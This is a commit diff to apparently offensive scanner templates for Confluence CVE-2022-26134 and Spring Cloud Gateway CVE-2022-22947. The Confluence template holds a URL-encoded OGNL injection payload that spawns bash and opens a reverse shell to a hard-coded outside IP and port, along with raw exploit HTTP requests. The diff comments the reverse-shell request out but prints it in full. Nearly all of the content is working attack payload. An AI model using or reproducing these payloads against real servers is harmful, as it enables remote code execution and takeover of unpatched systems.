x 2022-11-03

hktalent · hktalent · commit 1d71a98f920a · 2022-11-03T21:09:50.000+08:00
diff --git a/config/51pwn/Confluence_CVE-2022-26134.yaml b/config/51pwn/Confluence_CVE-2022-26134.yaml
@@ -19,25 +19,25 @@ variables:
   CheckPayload1: "%24%7B%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22Host%22%2C%22{{randstr}}%22%29%7D/"
   # CheckPayload1: "%24%7B%28java.net.InetAddress.getByName%28%22{{interactsh-url}}%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22Host%22%2C%2251pwn%22%29%29%7D/"
   # for reverse
-  RvsHst: "18.162.227.180"
-  RvsHstPort: "9999"
-  RvsPayload: "/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/{{RvsHst}}/{{RvsHstPort}}%200%3E%261%27%29.start%28%29%22%29%7D/"
+  # RvsHst: "51pwn.com"
+  # RvsHstPort: "9999"
+  # RvsPayload: "/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/{{RvsHst}}/{{RvsHstPort}}%200%3E%261%27%29.start%28%29%22%29%7D/"
   # GET {{mypaths}}/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/docker.for.mac.localhost/9999%200%3E%261%27%29.start%28%29%22%29%7D/ HTTP/1.1
 #   # 107.182.191.202
 requests:
   - raw:
-      - |+
-        GET {{mypaths}}/{{pay1}} HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
-        Accept:*/*
-        Pragma:no-cache
-        Accept-Encoding:gzip, deflate
-        Connection: close
-        Content-Length: 0
+      # - |+
+      #   GET {{mypaths}}/{{RvsPayload}} HTTP/1.1
+      #   Host: {{Hostname}}
+      #   User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+      #   Accept:*/*
+      #   Pragma:no-cache
+      #   Accept-Encoding:gzip, deflate
+      #   Connection: close
+      #   Content-Length: 0
         
       - |+
-        GET {{mypaths}}/{{pay1}} HTTP/1.1
+        GET {{mypaths}}/{{CheckPayload1}} HTTP/1.1
         Host: {{Hostname}}
         User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
         Accept:*/*
@@ -51,10 +51,7 @@ requests:
       mypaths:
         - "/bootstrap"
         - ""
-      pay1:
-        - "{{RvsPayload}}"
-        - "{{CheckPayload1}}"
-    attack: clusterbomb 
+    attack: pitchfork 
     unsafe: true
     # pipeline: true
     # pipeline-concurrent-connections: 40
diff --git a/config/51pwn/spring_cloud_gateway_CVE_2022_22947.yaml b/config/51pwn/spring_cloud_gateway_CVE_2022_22947.yaml
@@ -18,7 +18,7 @@ requests:
         Pragma:no-cache
         Content-Type: application/json
         Connection: keep-alive
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
         Content-Length: 333
 
         {

Original file line number	Diff line number	Diff line change
`@@ -18,7 +18,7 @@ requests:`
`18`	`18`	`Pragma:no-cache`
`19`	`19`	`Content-Type: application/json`
`20`	`20`	`Connection: keep-alive`
`21`		`- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36`
	`21`	`+ User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36`
`22`	`22`	`Content-Length: 333`
`23`	`23`
`24`	`24`	`{`